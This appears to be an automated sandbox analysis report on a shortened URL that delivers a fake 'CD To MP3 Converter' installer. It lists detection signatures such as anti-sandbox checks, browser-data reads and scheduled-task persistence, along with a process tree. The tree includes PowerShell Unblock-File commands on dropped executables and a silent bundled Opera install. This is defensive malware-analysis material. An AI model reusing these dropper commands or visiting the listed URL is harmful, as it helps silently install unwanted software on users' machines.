Analysis
-
max time kernel
1800s -
max time network
1784s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
-
submitted
14/07/2024, 13:32
General
-
Target
https://ify.ac/1Ic5
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 64 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Enumerates connected drives 3 TTPs 6 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Checks system information in the registry 2 TTPs 3 IoCs
System information is often read in order to detect sandboxing environments.
-
Drops file in System32 directory 29 IoCs
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 51 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 64 IoCs
-
NSIS installer 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 15 IoCs
-
Modifies Control Panel 64 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 46 IoCs
-
Modifies system certificate store 2 TTPs 5 IoCs
-
NTFS ADS 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 24 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 28 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ify.ac/1Ic51⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc23e93cb8,0x7ffc23e93cc8,0x7ffc23e93cd82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,7718157601306862227,11498264757230857016,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1940 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,7718157601306862227,11498264757230857016,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,7718157601306862227,11498264757230857016,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7718157601306862227,11498264757230857016,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7718157601306862227,11498264757230857016,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1928,7718157601306862227,11498264757230857016,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4992 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,7718157601306862227,11498264757230857016,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5788 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7718157601306862227,11498264757230857016,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7718157601306862227,11498264757230857016,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7718157601306862227,11498264757230857016,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7718157601306862227,11498264757230857016,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7718157601306862227,11498264757230857016,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7718157601306862227,11498264757230857016,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7718157601306862227,11498264757230857016,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7718157601306862227,11498264757230857016,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1928,7718157601306862227,11498264757230857016,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4524 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,7718157601306862227,11498264757230857016,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1320 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7718157601306862227,11498264757230857016,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7718157601306862227,11498264757230857016,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6816 /prefetch:12⤵
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Desktop\setup_LUBqCqe5Q2.exe"C:\Users\Admin\Desktop\setup_LUBqCqe5Q2.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BGRDQ.tmp\setup_LUBqCqe5Q2.tmp"C:\Users\Admin\AppData\Local\Temp\is-BGRDQ.tmp\setup_LUBqCqe5Q2.tmp" /SL5="$60170,5910876,56832,C:\Users\Admin\Desktop\setup_LUBqCqe5Q2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "cd_2_mp3-converter_7142"3⤵
-
-
C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32.exe"C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32.exe" cfc12eb941ee01209609eedf7992e9023⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 8404⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3156 -ip 31561⤵
-
C:\Users\Admin\Desktop\setup_LUBqCqe5Q2.exe"C:\Users\Admin\Desktop\setup_LUBqCqe5Q2.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-E017R.tmp\setup_LUBqCqe5Q2.tmp"C:\Users\Admin\AppData\Local\Temp\is-E017R.tmp\setup_LUBqCqe5Q2.tmp" /SL5="$60240,5910876,56832,C:\Users\Admin\Desktop\setup_LUBqCqe5Q2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "cd_2_mp3-converter_7142"3⤵
-
-
C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32.exe"C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32.exe" cfc12eb941ee01209609eedf7992e9023⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 8124⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 8204⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 8964⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 10204⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 10364⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 10364⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 10764⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 10884⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 10844⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 9004⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 9364⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 15524⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 11484⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 11804⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 18044⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 19764⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 19844⤵
- Program crash
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/bboobies4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xa8,0x10c,0x7ffc23e93cb8,0x7ffc23e93cc8,0x7ffc23e93cd85⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 16684⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 17684⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 17484⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 11244⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 17244⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 17524⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 16604⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 17284⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 17964⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 18004⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 17964⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 17284⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 17964⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 11804⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 19884⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 20844⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 21404⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 20884⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 21484⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 21604⤵
- Program crash
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\QbHuNyhi\gj2yOoXzj8b.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\QbHuNyhi\gj2yOoXzj8b.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 20804⤵
- Program crash
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\3csyhi2J\5Kg3OGnkFVthroTRCW9B.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\3csyhi2J\5Kg3OGnkFVthroTRCW9B.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 21764⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 17564⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 20924⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\3csyhi2J\5Kg3OGnkFVthroTRCW9B.exeC:\Users\Admin\AppData\Local\Temp\3csyhi2J\5Kg3OGnkFVthroTRCW9B.exe --silent --allusers=04⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSCB820B3B\setup.exeC:\Users\Admin\AppData\Local\Temp\7zSCB820B3B\setup.exe --silent --allusers=0 --server-tracking-blob=NDFlZGNmMjBmOGE5MTFhNTA4YmVlNTI4MDRhN2FkMTUwMzNkMWQ3Yjg2Yjk3MmJkNjMyYjI5N2E4NGZjOGY4MDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MjA5NjQyMDMuNTk2MiIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiMzc4MTk1ZGYtMTNiNy00NTJkLThjNTMtODRhODZlZGNkYzU4In0=5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\7zSCB820B3B\setup.exeC:\Users\Admin\AppData\Local\Temp\7zSCB820B3B\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x330,0x334,0x338,0x30c,0x33c,0x71f4b1f4,0x71f4b200,0x71f4b20c6⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCB820B3B\setup.exe"C:\Users\Admin\AppData\Local\Temp\7zSCB820B3B\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5044 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240714133648" --session-guid=8ec3b7bc-3549-4693-8c52-babf0ee96a70 --server-tracking-blob=YTczMjNjZTI2M2YzNjk0Mzk3N2Y1NDAzMjAzYTEwMzlmMzFjODVmMTAwODM0MzRlNmZjZDA1YmVmYTBlNTMxNzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjExIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMDk2NDIwMy41OTYyIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiIzNzgxOTVkZi0xM2I3LTQ1MmQtOGM1My04NGE4NmVkY2RjNTgifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=38060000000000006⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\AppData\Local\Temp\7zSCB820B3B\setup.exeC:\Users\Admin\AppData\Local\Temp\7zSCB820B3B\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x328,0x32c,0x33c,0x304,0x340,0x7141b1f4,0x7141b200,0x7141b20c7⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
